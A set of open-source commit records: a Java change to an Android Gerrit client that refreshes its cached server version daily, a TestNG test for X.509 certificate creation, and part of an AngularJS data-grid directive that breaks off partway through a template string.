Refresh cached server version at least once every day Signed-off-by: Jorge Ruesga <[email protected]>
gerrit/src/main/java/com/ruesga/rview/gerrit/GerritApiClient.java
Refresh cached server version at least once every day
<ide><path>errit/src/main/java/com/ruesga/rview/gerrit/GerritApiClient.java <ide> import android.net.Uri; <ide> import android.support.annotation.NonNull; <ide> import android.support.annotation.Nullable; <add>import android.text.format.DateUtils; <ide> <ide> import com.burgstaller.okhttp.AuthenticationCacheInterceptor; <ide> import com.burgstaller.okhttp.CachingAuthenticatorDecorator; <ide> private final String mEndPoint; <ide> private final GerritApi mService; <ide> private final PlatformAbstractionLayer mAbstractionLayer; <del> protected ServerVersion mServerVersion; <add> private long mLastServerVersionCheck = 0; <add> ServerVersion mServerVersion; <ide> <ide> private final ApiVersionMediator mMediator = new ApiVersionMediator() { <ide> @Override <ide> <ide> private <T> Observable<T> withVersionRequestCheck(final Observable<T> observable) { <ide> return Observable.fromCallable(() -> { <del> if (mServerVersion == null) { <add> long now = System.currentTimeMillis(); <add> if (mServerVersion == null || <add> (now - mLastServerVersionCheck > DateUtils.DAY_IN_MILLIS)) { <ide> mServerVersion = getServerVersion().toBlocking().first(); <add> mLastServerVersionCheck = now; <ide> } <ide> return observable.toBlocking().first(); <ide> });
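The change above makes GerritApiClient re-check the cached Gerrit server version whenever it is missing or older than one day (DateUtils.DAY_IN_MILLIS) before any request wrapped by withVersionRequestCheck is executed. A minimal, framework-free sketch of that time-based refresh pattern, using hypothetical names that are not part of the client, could look like this in plain Java:

import java.util.concurrent.TimeUnit;
import java.util.function.Supplier;

// Sketch only: reuses a cached value until it is older than one day, then reloads it,
// mirroring the mServerVersion / mLastServerVersionCheck fields added in the diff above.
public class DailyRefreshCache<T> {
    private static final long MAX_AGE_MS = TimeUnit.DAYS.toMillis(1);

    private final Supplier<T> loader; // e.g. a blocking call that fetches the server version
    private T cached;
    private long lastCheck;

    public DailyRefreshCache(Supplier<T> loader) {
        this.loader = loader;
    }

    public synchronized T get() {
        long now = System.currentTimeMillis();
        if (cached == null || now - lastCheck > MAX_AGE_MS) {
            cached = loader.get(); // refresh a missing or stale value
            lastCheck = now;
        }
        return cached;
    }
}

In the real client the same check runs lazily inside Observable.fromCallable, so every API call first ensures the cached server version is at most a day old before the wrapped request is executed.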
Java
mit
7bcd6833cb72038731748617851f76269e4c4a2f
0
astrapi69/mystic-crypt,astrapi69/mystic-crypt
/** * The MIT License * * Copyright (C) 2015 Asterios Raptis * * Permission is hereby granted, free of charge, to any person obtaining * a copy of this software and associated documentation files (the * "Software"), to deal in the Software without restriction, including * without limitation the rights to use, copy, modify, merge, publish, * distribute, sublicense, and/or sell copies of the Software, and to * permit persons to whom the Software is furnished to do so, subject to * the following conditions: * * The above copyright notice and this permission notice shall be * included in all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND * NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE * LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION * OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION * WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. */ package de.alpharogroup.crypto.factories; import java.math.BigInteger; import java.security.KeyPair; import java.security.NoSuchAlgorithmException; import java.security.PrivateKey; import java.security.PublicKey; import java.security.SecureRandom; import java.security.cert.X509Certificate; import java.util.Date; import org.testng.AssertJUnit; import org.testng.annotations.Test; import de.alpharogroup.crypto.CryptConst; import de.alpharogroup.crypto.algorithm.HashAlgorithm; import de.alpharogroup.crypto.algorithm.KeyPairGeneratorAlgorithm; import de.alpharogroup.crypto.algorithm.RngAlgorithm; /** * Test class for the class {@link CertFactory}. */ public class CertFactoryTest { /** * Returns a random serial number that can be used for a serial number. * * @return a random serial number as a {@link BigInteger} object. */ public static BigInteger randomSerialNumber() { long next = 0; try { next = SecureRandom.getInstance(RngAlgorithm.SHA1PRNG.getAlgorithm()).nextLong(); } catch (final NoSuchAlgorithmException e) { e.printStackTrace(); } if (next < 0) { next = next * (-1); } final BigInteger serialNumber = BigInteger.valueOf(next); return serialNumber; } /** * Test method for * {@link CertFactory#newX509Certificate(PublicKey, PrivateKey, String, String, String, Date, Date)}. */ @Test public void testNewX509CertificatePublicKeyPrivateKeyStringStringStringDateDate() throws Exception { final KeyPair keyPair = KeyPairFactory.newKeyPair(KeyPairGeneratorAlgorithm.RSA, 2048); final PrivateKey privateKey = keyPair.getPrivate(); final PublicKey publicKey = keyPair.getPublic(); final String subject = "CN=Test subject"; final String issuer = "CN=Test issue"; final String signatureAlgorithm = HashAlgorithm.SHA256.getAlgorithm() + CryptConst.WITH + KeyPairGeneratorAlgorithm.RSA.getAlgorithm(); final Date start = new Date(System.currentTimeMillis()); final Date end = new Date(System.currentTimeMillis() + (1000L * 60 * 60 * 24 * 100)); final BigInteger serialNumber = randomSerialNumber(); final X509Certificate cert = CertFactory.newX509Certificate(publicKey, privateKey, serialNumber, subject, issuer, signatureAlgorithm, start, end); AssertJUnit.assertNotNull(cert); } /** * Test method for * {@link CertFactory#newX509CertificateV1(KeyPair, X500Name, BigInteger, Date, Date, X500Name, String)}. 
*/ @Test public void testNewX509CertificateV1() throws Exception { final KeyPair keyPair = KeyPairFactory.newKeyPair(KeyPairGeneratorAlgorithm.RSA, 2048); X500Name issuer = new X500Name("CN=Issuer of this certificate"); BigInteger serial = BigInteger.ONE; Date notBefore = Date.from(Instant.now()); Date notAfter = Date.from(Instant.now().plusSeconds(60 * 60 * 24 * 365 * 5)); X500Name subject = new X500Name("CN=Subject of this certificate"); String signatureAlgorithm = "SHA1withRSA"; X509Certificate cert = CertFactory.newX509CertificateV1(keyPair, issuer, serial, notBefore, notAfter, subject, signatureAlgorithm); AssertJUnit.assertNotNull(cert); } }
crypt-data/src/test/java/de/alpharogroup/crypto/factories/CertFactoryTest.java
/** * The MIT License * * Copyright (C) 2015 Asterios Raptis * * Permission is hereby granted, free of charge, to any person obtaining * a copy of this software and associated documentation files (the * "Software"), to deal in the Software without restriction, including * without limitation the rights to use, copy, modify, merge, publish, * distribute, sublicense, and/or sell copies of the Software, and to * permit persons to whom the Software is furnished to do so, subject to * the following conditions: * * The above copyright notice and this permission notice shall be * included in all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND * NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE * LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION * OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION * WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. */ package de.alpharogroup.crypto.factories; import java.math.BigInteger; import java.security.KeyPair; import java.security.NoSuchAlgorithmException; import java.security.PrivateKey; import java.security.PublicKey; import java.security.SecureRandom; import java.security.cert.X509Certificate; import java.util.Date; import org.testng.AssertJUnit; import org.testng.annotations.Test; import de.alpharogroup.crypto.CryptConst; import de.alpharogroup.crypto.algorithm.HashAlgorithm; import de.alpharogroup.crypto.algorithm.KeyPairGeneratorAlgorithm; import de.alpharogroup.crypto.algorithm.RngAlgorithm; /** * Test class for the class {@link CertFactory}. */ public class CertFactoryTest { /** * Returns a random serial number that can be used for a serial number. * * @return a random serial number as a {@link BigInteger} object. */ public static BigInteger randomSerialNumber() { long next = 0; try { next = SecureRandom.getInstance(RngAlgorithm.SHA1PRNG.getAlgorithm()).nextLong(); } catch (final NoSuchAlgorithmException e) { e.printStackTrace(); } if (next < 0) { next = next * (-1); } final BigInteger serialNumber = BigInteger.valueOf(next); return serialNumber; } /** * Test method for * {@link CertFactory#newX509Certificate(PublicKey, PrivateKey, String, String, String, Date, Date)}. */ @Test public void testNewX509CertificatePublicKeyPrivateKeyStringStringStringDateDate() throws Exception { final KeyPair keyPair = KeyPairFactory.newKeyPair(KeyPairGeneratorAlgorithm.RSA, 2048); final PrivateKey privateKey = keyPair.getPrivate(); final PublicKey publicKey = keyPair.getPublic(); final String subject = "CN=Test subject"; final String issuer = "CN=Test issue"; final String signatureAlgorithm = HashAlgorithm.SHA256.getAlgorithm() + CryptConst.WITH + KeyPairGeneratorAlgorithm.RSA.getAlgorithm(); final Date start = new Date(System.currentTimeMillis()); final Date end = new Date(System.currentTimeMillis() + (1000L * 60 * 60 * 24 * 100)); final BigInteger serialNumber = randomSerialNumber(); final X509Certificate cert = CertFactory.newX509Certificate(publicKey, privateKey, serialNumber, subject, issuer, signatureAlgorithm, start, end); AssertJUnit.assertNotNull(cert); } }
Update CertFactoryTest.java
crypt-data/src/test/java/de/alpharogroup/crypto/factories/CertFactoryTest.java
Update CertFactoryTest.java
<ide><path>rypt-data/src/test/java/de/alpharogroup/crypto/factories/CertFactoryTest.java <ide> AssertJUnit.assertNotNull(cert); <ide> } <ide> <add> /** <add> * Test method for <add> * {@link CertFactory#newX509CertificateV1(KeyPair, X500Name, BigInteger, Date, Date, X500Name, String)}. <add> */ <add> @Test <add> public void testNewX509CertificateV1() throws Exception { <add> final KeyPair keyPair = KeyPairFactory.newKeyPair(KeyPairGeneratorAlgorithm.RSA, 2048); <add> X500Name issuer = new X500Name("CN=Issuer of this certificate"); <add> BigInteger serial = BigInteger.ONE; <add> Date notBefore = Date.from(Instant.now()); <add> Date notAfter = Date.from(Instant.now().plusSeconds(60 * 60 * 24 * 365 * 5)); <add> X500Name subject = new X500Name("CN=Subject of this certificate"); <add> String signatureAlgorithm = "SHA1withRSA"; <add> X509Certificate cert = CertFactory.newX509CertificateV1(keyPair, issuer, serial, notBefore, notAfter, subject, <add> signatureAlgorithm); <add> AssertJUnit.assertNotNull(cert); <add> } <add> <ide> }
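The commit above adds testNewX509CertificateV1, which calls CertFactory.newX509CertificateV1 with issuer and subject X500Name values, a serial number, a roughly five-year validity window built from Instant, and the SHA1withRSA signature algorithm; note that the test also relies on org.bouncycastle.asn1.x500.X500Name and java.time.Instant imports that are not visible in this record. As an illustration only, and not the actual CertFactory source, a self-signed X.509 version 1 certificate with those parameters can be produced with BouncyCastle's JcaX509v1CertificateBuilder roughly like this:

import java.math.BigInteger;
import java.security.KeyPair;
import java.security.cert.X509Certificate;
import java.util.Date;

import org.bouncycastle.asn1.x500.X500Name;
import org.bouncycastle.cert.X509CertificateHolder;
import org.bouncycastle.cert.jcajce.JcaX509CertificateConverter;
import org.bouncycastle.cert.jcajce.JcaX509v1CertificateBuilder;
import org.bouncycastle.operator.ContentSigner;
import org.bouncycastle.operator.jcajce.JcaContentSignerBuilder;

// Sketch of building a self-signed X.509 v1 certificate; the parameter order follows the
// newX509CertificateV1 call in the test above, but this is not the library's implementation.
public final class X509V1Sketch {
    public static X509Certificate newSelfSignedV1(KeyPair keyPair, X500Name issuer,
            BigInteger serial, Date notBefore, Date notAfter, X500Name subject,
            String signatureAlgorithm) throws Exception {
        ContentSigner signer =
            new JcaContentSignerBuilder(signatureAlgorithm).build(keyPair.getPrivate());
        X509CertificateHolder holder = new JcaX509v1CertificateBuilder(
            issuer, serial, notBefore, notAfter, subject, keyPair.getPublic()).build(signer);
        return new JcaX509CertificateConverter().getCertificate(holder);
    }
}

JcaX509CertificateConverter uses the default JCA provider here; registering the BouncyCastle provider and calling setProvider("BC") is a common alternative when the default provider cannot parse the generated certificate.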
JavaScript
mit
1c473c5ab05f13405a7dc62b9ac427eeba38dbac
0
vision-ti/angular-vision-grid,vision-ti/angular-vision-grid
'use strict'; /* * angular-vision-grid * v1.0.0-rc2 * (c) 2014 VisionGrid Team http://vision-ti.com.br * License: MIT */ angular.module('vision.grid', ['vision.grid.util']) /** * Directive para ser utilizada pela coluna ao realizar o sort * Útil para ser utilizada dentro de um headerRenderer customizado */ .directive('columnSort', [function () { return { require: '^grid', restrict: 'E', templateUrl: 'template/vision/grid/column-sort.html' } }]) .directive('visionCell', [function(){ return { require: '^visionGrid', replace: 'A', link: function(scope, element, attrs, gridCtrl){ if (scope.column.editable){ var position = attrs.rowIndex + attrs.colIndex; scope.cells[position] = { rowIndex: parseInt(attrs.rowIndex), colIndex: parseInt(attrs.colIndex), element: element, column: scope.column }; } scope.hasFocus = function(rowIndex, colIndex){ return (String(rowIndex) + String(colIndex) == scope.cellIndex.current.position); }; } } }]) .directive('gridEditor', ['$compile', function ($compile) { return { require: '^visionGrid', replace: 'A', link: function (scope, element, attrs) { if (!attrs.ngModel){ element.attr('ng-model', 'row.item.' + scope.column.fieldName); $compile(element)(scope); } } }; }]) .directive('visionGrid', ['vsGridUtil', '$filter', '$timeout', '$window', '$animate', function (vsGridUtil, $filter, $timeout, $window, $animate) { return { restrict: 'E', replace: true, templateUrl: 'template/vision/grid/vision-grid.html', transclude: true, scope: { init: '&', provider: '=?', onSelect: '&', itemDoubleClick: '&', cellBlur: '&', height: '@', selectionMode: '@', headerHeight: '@', rowHeight: '@', rowColorFunction: '&', rowColorField: '@', scrollOffset: '@', headerBar: '@', footerBar: '@', expandRowUrl: '@', expandColumnHeader: '@', expandColumnRenderer: '@', toggleExpandRow: '=?', virtualScrollEnabled: '=?', minRows: '@' }, controller: ['$scope', '$element', '$attrs', function ($scope, $elment, $attrs) { this.nextCell = function(){ $scope.goToCell($scope.cellIndex.current.colIndex + 1); }; this.previousCell = function(){ $scope.goToCell($scope.cellIndex.current.colIndex - 1); }; /** * Disparado pelo grid column * @param column */ this.addColumn = function (column) { this.addColumnAt($scope.columns.length, column); }; /** * Adiciona uma coluna em uma posição específica * @param index * @param column */ this.addColumnAt = function (index, column) { if (!angular.isDefined(column.fieldName)) { throw 'When adding gridColumn, fieldName is required!'; } $scope.addColumnAt(index, column); }; /** * Retorna a coluna pelo fieldName * @param fieldName */ this.getColumnByFieldName = function (fieldName) { for (var i = 0; i < $scope.columns.length; i++) { if ($scope.columns[i].fieldName == fieldName) return $scope.columns[i]; } }; /** * Retorna a coluna pelo índice * @param $index * @returns {*} */ this.getColumn = function ($index) { return $scope.columns[$index]; }; /** * Retorna o array das colunas * @returns {Array} */ this.getColumns = function () { return $scope.columns; }; /** * Função para setar o provider manualmente no $scope da directive * @param provider */ this.setProvider = function (provider) { $scope.provider = provider; }; /** * Função para obter o item selecionado da grid * @return {Object} */ this.getSelectedItem = function () { return $scope.selectedItem; }; /** * Retorna a coluna selecionada * @returns {*|columnSelected|getData.columnSelected} */ this.getColumnSelected = function () { return $scope.columnSelected; }; //Update grid height and recalculate this.setHeight = function 
(value) { $scope.updateHeight(value); }; /** * Obtém o nome da grid */ this.getGridName = function () { return $scope.gridName; }; /** * Configura a expandRow * @param expandRowUrl */ this.setExpandRowUrl = function (expandRowUrl) { $scope.setExpandRowUrl(expandRowUrl); }; /** * Muda o outerScope padrão que é o scope.$parent * @param outerScope */ this.setOuterScope = function (outerScope) { $scope.outerScope = outerScope; }; }], link: function (scope, element, attrs, ctrl) { var userAgent = $window.navigator.userAgent.toLowerCase(); var isFirefox = userAgent.indexOf('firefox') > -1; var isOpera = userAgent.indexOf('opera') > -1; var commandKeyCode = isFirefox ? 224 : (isOpera ? 17 : 91 /* webkit */); scope.outerScope = scope.$parent; scope.cells = {}; scope.editableColumns = []; //Define se a expand-row será mantida aberta scope.toggleExpandRow = vsGridUtil.getDefined(scope.toggleExpandRow, true); scope.gridName = vsGridUtil.getDefined(attrs.name, 'grid'); //Cria uma referência do ctrl no scope do elemento parent angular.element(element[0].parentElement).scope()[scope.gridName] = ctrl; /** * Será a cópia do provider * Essencial para realizar o sort na lista para que o selectedIndex seja buscado pelo provider original * @type {Array} */ scope.gridProvider = []; /** * ng-repeat * @type {Array} */ scope.renderedProvider = []; scope.viewPortStyle = {}; scope.tablePortStyle = {}; scope.tablePortStyle.position = 'relative'; scope.columns = []; var minRows, headerHeight, height, rowHeight, viewPortHeight; // Define a quantidade mínima de linhas a serem exibidas na grid scope.minRows = vsGridUtil.getDefined(scope.minRows, '0'); minRows = Number(scope.minRows); //Seta o headerHeight scope.headerHeight = vsGridUtil.getDefined(scope.headerHeight, '30px'); headerHeight = Number(scope.headerHeight.replace('px', '')); scope.headerStyle = {}; scope.headerStyle.height = scope.headerHeight; scope.headerStyle.lineHeight = scope.headerHeight; // headerHeight attrs.rowHeight = vsGridUtil.getDefined(scope.rowHeight, '30px'); rowHeight = Number(attrs.rowHeight.replace('px', '')); //Altura da grid attrs.height = vsGridUtil.getDefined(attrs.height, '300px'); height = Number(attrs.height.replace('px', '')); scope.styleContainer = {}; scope.styleContainerInner = {}; if (scope.virtualScrollEnabled) { scope.styleContainer.height = attrs.height; scope.styleContainerInner.height = (height - headerHeight) + 'px'; } var innerContainer = element.find('.fixed-table-container-inner'); var headerBar = null, footerBar = null; var tableHeader = element.find('.table-header'); var spinner = element.find('#vs-grid-spinner'); var raw = innerContainer[0]; var rangeStart, rangeEnd; innerContainer.scroll(function (event) { //Header scroll(horizontal) if (headerBar == null && footerBar == null) { headerBar = element.find('.vs-header-bar'); footerBar = element.find('.vs-footer-bar'); } else { headerBar.offset({ left: (-1 * this.scrollLeft) + innerContainer.offset().left}); footerBar.offset({ left: (-1 * this.scrollLeft) + innerContainer.offset().left}); } tableHeader.offset({ left: (-1 * this.scrollLeft) + innerContainer.offset().left}); if (scope.virtualScrollEnabled) { //Virtual scroll(vertical) rangeStart = Math.ceil(raw.scrollTop / rowHeight); rangeEnd = Math.ceil((raw.scrollTop + raw.offsetHeight) / rowHeight); if (raw.scrollTop + raw.offsetHeight <= viewPortHeight) { scope.tablePortStyle.top = raw.scrollTop + 'px'; scope.renderProvider(scope.gridProvider.slice(rangeStart, rangeEnd)); scope.$digest(); } } }); /** * Change scroll 
position to rowIndex */ scope.scrollToRowIndex = function(rowIndex){ $timeout(function(){ if (rowIndex < rangeStart){ raw.scrollTop -= rowHeight; innerContainer.scroll(); }else if (rowIndex + 1 > rangeEnd){ raw.scrollTop += rowHeight; innerContainer.scroll(); } }); }; /** * Return virtual rows lenght to render rows with no-data, for visual aspect * @returns {number} */ var getVirtualRowsLength = function () { return scope.virtualScrollEnabled ? Math.ceil((height - headerHeight) / rowHeight) : scope.gridProvider.length; }; /** * Update virtual scroll height * @param height */ scope.updateHeight = function (value) { height = value; scope.styleContainer.height = height + 'px'; scope.styleContainerInner.height = (height - headerHeight) + 'px'; scope.renderProvider(scope.gridProvider, getVirtualRowsLength()); scope.$apply(); }; /** * Adiciona as rows a serem renderizadas */ scope.renderProvider = function (rows, length) { if (length == undefined) { length = rows.length; } scope.renderedProvider.length = length; for (var i = 0; i < length || i < minRows; i++) { if (angular.isDefined(rows[i])) { scope.renderedProvider[i] = {item:rows[i]}; } else { scope.renderedProvider[i] = {}; } } }; /** * Atualiza o gridProvider */ scope.$watchCollection('provider', function (newValue, oldValue) { clearSelection(); //Realiza a cópia do provider scope.gridProvider = []; if (scope.provider != null && scope.provider != undefined) angular.extend(scope.gridProvider, scope.provider); //Faz o cálculo do height da viewPort para virtual scroll if (scope.virtualScrollEnabled && angular.isDefined(newValue) && newValue.length > 0) { viewPortHeight = newValue.length * rowHeight; scope.viewPortStyle.height = viewPortHeight + 'px'; } if (oldValue == undefined || newValue == undefined || newValue.length != oldValue.length) { $timeout(function () { raw.scrollTop = 0; innerContainer.scroll(); }); } }); /** * Atualiza o renderedProvider */ scope.$watchCollection('gridProvider', function (value) { //Desenha as rows (desenha rows virtuais sem dados no caso de virtualScrollEnabled) scope.renderProvider(scope.gridProvider, getVirtualRowsLength()); rangeStart = 0; rangeEnd = scope.renderedProvider.length; }); /** * Configura o style da row * @param item * @returns {{}} */ scope.getRowStyle = function (item) { var rowStyle = {}; rowStyle.height = scope.rowHeight; //Desenha a cor de fundo da row por uma propriedade de um item do provider if (angular.isDefined(scope.rowColorField)) { var color = vsGridUtil.evaluate(item, scope.rowColorField); if (angular.isDefined(color)) rowStyle.backgroundColor = color; } //Desenha a cor de fundo de acordo com uma function if (angular.isDefined(attrs.rowColorFunction)) { var color = scope.rowColorFunction({$item: item}); if (angular.isDefined(color)) rowStyle.backgroundColor = color; } return rowStyle; }; /** * Configura o style da coluna * @param column */ scope.getColumnStyle = function (column, position) { var columnStyle = {}; if (position == 'header') { columnStyle.textAlign = column.headerTextAlign; } else { columnStyle.textAlign = column.textAlign; } if (angular.isDefined(column.width)) columnStyle.width = column.width; else { columnStyle.minWidth = '80px'; columnStyle.width = 'auto !important'; } return columnStyle; }; /** * Adiciona a coluna * Private function * @param index * @param column */ scope.addColumnAt = function (index, column) { column.index = index; if (column instanceof GridColumnDecimal && !angular.isDefined(column.labelFunction)) { column.labelFunction = 
vsGridUtil.formatDecimal; } if (column instanceof GridColumnDate && !angular.isDefined(column.labelFunction)) { column.labelFunction = vsGridUtil.formatDate; } if (column instanceof GridColumnEnum && !angular.isDefined(column.labelFunction)) { column.labelFunction = vsGridUtil.formatEnum; } if (column.editable) scope.editableColumns.push(column); /** * Evento disparado no $rootScope para configuração * de labelFunction de implementações de outras colunas */ scope.$emit('grid:addColumn', column); scope.columns.splice(index, 0, column); }; /** * Retorna a String do item para exibir na grid * @param item * @param column * @returns {*} */ scope.getItem = function ($index, item, column) { var valueOf; if (angular.isFunction(column.labelFunction)) { valueOf = column.labelFunction(item, column, $index); } else valueOf = vsGridUtil.evaluate(item, column.fieldName); return valueOf != undefined ? valueOf.toString() : ''; }; /** * Verifica se foi informado o headerRenderer na coluna * @param column * @returns {boolean|*} */ scope.isHeaderRenderer = function (column) { return angular.isDefined(column.headerRenderer); }; /** * Verifica se tem um itemRenderer informado * @param column * @returns {boolean} */ scope.isItemRenderer = function (item, column) { return angular.isDefined(column.itemRenderer); }; /** * Dispara o double-click */ scope.selectItemDblclick = function (item, column) { scope.selectItem(item, column); if (attrs.itemDoubleClick) { scope.itemDoubleClick({$data: scope.getData()}); } scope.$emit(scope.gridName + ':itemDoubleClick', scope.getData()); }; /** * Seta o selectedItem * @param item */ scope.selectedItems = []; attrs.selectionMode = vsGridUtil.getDefined(scope.selectionMode, 'single'); var begin, end, virtualIndex, lastIndex = -1; scope.selectItem = function (item, column) { scope.columnSelected = column; if (!angular.isDefined(item)) return; scope.selectedIndex = scope.provider.indexOf(item); virtualIndex = scope.gridProvider.indexOf(item); scope.selectedItem = item; if (scope.shiftKey) { if (lastIndex == -1) { lastIndex = virtualIndex; scope.selectedItems = []; } if (lastIndex < virtualIndex) { begin = lastIndex; end = virtualIndex; } else { begin = virtualIndex; end = lastIndex; } scope.selectedItems = scope.gridProvider.slice(begin, end + 1); } else if (scope.ctrlKey) { if (scope.selectedItems.indexOf(item) == -1) scope.selectedItems.push(item); else { var indexOf = scope.selectedItems.indexOf(item); scope.selectedItems.splice(indexOf, 1); } lastIndex = virtualIndex; } else { lastIndex = virtualIndex; scope.selectedItems = [item]; } if (angular.isDefined(attrs.onSelect)) { //Callback function para o item selecionado scope.onSelect({$data: scope.getData()}); } scope.$emit(scope.gridName + ':onSelect', scope.getData()); }; /** * Object com a informação do item selecionado na grid * @returns {{}} */ scope.getData = function () { var $data = {}; $data.selectedIndex = scope.selectedIndex; $data.selectedItem = scope.selectedItem; $data.columnSelected = scope.columnSelected; $data.selectedItems = scope.selectedItems; return $data; }; /** * Limpa a seleção * @private */ var clearSelection = function () { scope.selectedItems = []; scope.selectedItem = null; scope.selectedIndex = null; scope.selectedColumn = null; }; /** * Ao clicar em um item atribui o class de seleção * @param item * @returns {string} */ scope.selectClass = function (item) { if ((item == scope.selectedItem && scope.selectionMode == 'single') || (scope.selectedItems.indexOf(item) != -1 && scope.selectionMode == 
'multiple')) { return 'selected-item'; } else return ''; }; /** * onKeyDown * @param $event */ scope.onKeyDown = function ($event) { if ($event.keyCode == 9) { if ($event.shiftKey){ ctrl.previousCell(); }else{ ctrl.nextCell(); } $event.preventDefault(); } if ($event.keyCode == 38 || $event.keyCode == 40) { if (virtualIndex == undefined) virtualIndex = -1; //up key if ($event.keyCode == 38) { if (virtualIndex < 0) { virtualIndex = 0 } else if (virtualIndex > 0) { virtualIndex--; } } //down key if ($event.keyCode == 40) { if (virtualIndex > scope.gridProvider.length) { virtualIndex = scope.gridProvider.length; } else if (virtualIndex < scope.gridProvider.length) { virtualIndex++; } } scope.selectItem(scope.gridProvider[virtualIndex], scope.selectedColumn); scope.scrollToRowIndex(virtualIndex); } if (scope.selectionMode == 'multiple') { scope.shiftKey = $event.shiftKey; scope.ctrlKey = $event.ctrlKey || $event.keyCode == commandKeyCode; } scope.$emit(scope.gridName + ':onKeyDown', $event); }; scope.cellIndex = {current:{rowIndex: -1, colIndex: -1, position: '-1'}}; scope.cellIndex.old = scope.cellIndex.current; scope.goToCell = function(colIndex){ if (virtualIndex == undefined) virtualIndex = -1; if (scope.cellIndex.current.rowIndex == -1){ scope.cellIndex.current.rowIndex = 0; scope.cellIndex.current.colIndex = 0; } var rowIndex = scope.cellIndex.current.rowIndex; if (colIndex < 0){ virtualIndex--; rowIndex--; colIndex = scope.editableColumns[scope.editableColumns.length - 1].index; }else if (colIndex > scope.editableColumns.length -1){ virtualIndex++; rowIndex++; colIndex = scope.editableColumns[0].index; } var position = String(rowIndex) + String(scope.editableColumns[colIndex].index); var cell = scope.cells[position]; if (cell){ if (attrs.cellBlur && scope.cellIndex.old != scope.cellIndex.current){ scope.cellBlur({ $data:{ oldCell: scope.cells[scope.cellIndex.old.position], cell: scope.cells[scope.cellIndex.current.position], selectedItem: scope.getData().selectedItem } }); } scope.cellIndex.old = scope.cellIndex.current; scope.cellIndex.current.rowIndex = rowIndex; scope.cellIndex.current.colIndex = colIndex; scope.cellIndex.current.position = position; $timeout(function(){ angular.element(cell.element).find('input')[0].focus(); }); }else if (rowIndex > scope.renderedProvider.length - 1){ scope.scrollToRowIndex(virtualIndex); scope.goToCell(0); } }; /** * onKeyUp * @param $event */ scope.onKeyUp = function ($event) { if (scope.selectionMode == 'multiple') { scope.shiftKey = $event.shiftKey; scope.ctrlKey = $event.ctrlKey; if ($event.keyCode == commandKeyCode) scope.ctrlKey = false; } scope.$emit(scope.gridName + ':onKeyUp', $event); }; //Sort object scope.sort = { sortingField: 'id', reverse: false }; /** * class style do sorter * @param fieldName * @returns {string} */ scope.selectSorterClass = function (fieldName) { if (fieldName == scope.sort.sortingField) { return ('glyphicon glyphicon-chevron-' + ((scope.sort.reverse) ? 
'down' : 'up')); } else { return ''; } }; /** * Realiza o sort * @param newSortingField */ scope.sortBy = function (newSortingField) { if (scope.sort.sortingField == newSortingField) { scope.sort.reverse = !scope.sort.reverse; } scope.sort.sortingField = newSortingField; scope.gridProvider = $filter('orderBy')(scope.provider, scope.sort.sortingField, scope.sort.reverse); }; /** * Verifica se tem headerBar * @returns {boolean|*} */ scope.hasHeaderBar = function () { return angular.isDefined(attrs.headerBar); }; /** * Verifica se tem footerBar * @returns {boolean|*} */ scope.hasFooterBar = function () { return angular.isDefined(attrs.footerBar); }; /** * Style header-footer */ var headerFooterStyle = {}; scope.getHeaderFooterStyle = function () { headerFooterStyle.width = innerContainer[0].scrollWidth; return headerFooterStyle; }; //Função disparada pelo expandColumnRenderer scope.openCloseExpandRow = function (item) { item.expandRowOpened = !item.expandRowOpened; if (scope.toggleExpandRow) { angular.forEach(scope.renderedProvider, function (value, index) { if (value != item) value.expandRowOpened = false; }); } }; scope.expandRow = undefined; /** * Configura a expandRow */ scope.setExpandRowUrl = function (expandRowUrl) { scope.expandRow = expandRowUrl; attrs.expandColumnRenderer = vsGridUtil.getDefined(scope.expandColumnRenderer, 'template/vision/grid/expandColumnRenderer.html'); var expandColumn = new GridColumn(); expandColumn.fieldName = 'expandColumn'; expandColumn.width = '70px'; expandColumn.textAlign = 'center'; expandColumn.itemRenderer = attrs.expandColumnRenderer; if (angular.isDefined(scope.expandColumnHeader)) { expandColumn.headerText = scope.expandColumnHeader; } scope.addColumnAt(0, expandColumn); }; if (angular.isDefined(scope.expandRowUrl)) scope.setExpandRowUrl(scope.expandRowUrl); /** * Dispara o método config para inicializar as colunas */ if (angular.isDefined(attrs.init)) { scope.init({$ctrl: ctrl}); scope.$emit(scope.gridName + ':init', {$ctrl: ctrl}); } } } } ]) .run(["$templateCache", function($templateCache) { $templateCache.put("template/vision/grid/vision-grid.html", "<div class=\"row\">\n"+ " <div class=\"vs-grid col-sm-12\">\n"+ " <div class=\"header-footer\" ng-if=\"hasFooterBar()\">\n"+ " <div class=\"vs-header-bar\" ng-include=\"headerBar\" ng-style=\"getHeaderFooterStyle()\"></div>\n"+ " </div>\n"+ " <div class=\"fixed-table-container\" ng-style=\"styleContainer\" class=\"table table-bordered\" tabindex=\"0\" ng-keydown=\"onKeyDown($event)\" ng-keyup=\"onKeyUp($event)\">\n"+ " <div class=\"table-header\">\n"+ " <table class=\"table-bordered table-vision\">\n"+ " <thead>\n"+ " <tr>\n"+ " <th ng-repeat=\"column in columns track by $index\"\n"+ " class=\"vs-grid-column\"\n"+ " ng-show=\"column.visible\"\n"+ " ng-style=\"getColumnStyle(column, 'header')\"\n"+ " ng-class=\"{first: $first}\">\n"+ " <div ng-style=\"headerStyle\" ng-show=\"isHeaderRenderer(column)\" ng-include=\"column.headerRenderer\"></div>\n"+ " <div ng-style=\"headerStyle\" ng-show=\"!isHeaderRenderer(column)\">\n"+ " <span ng-show=\"!column.sortable\" 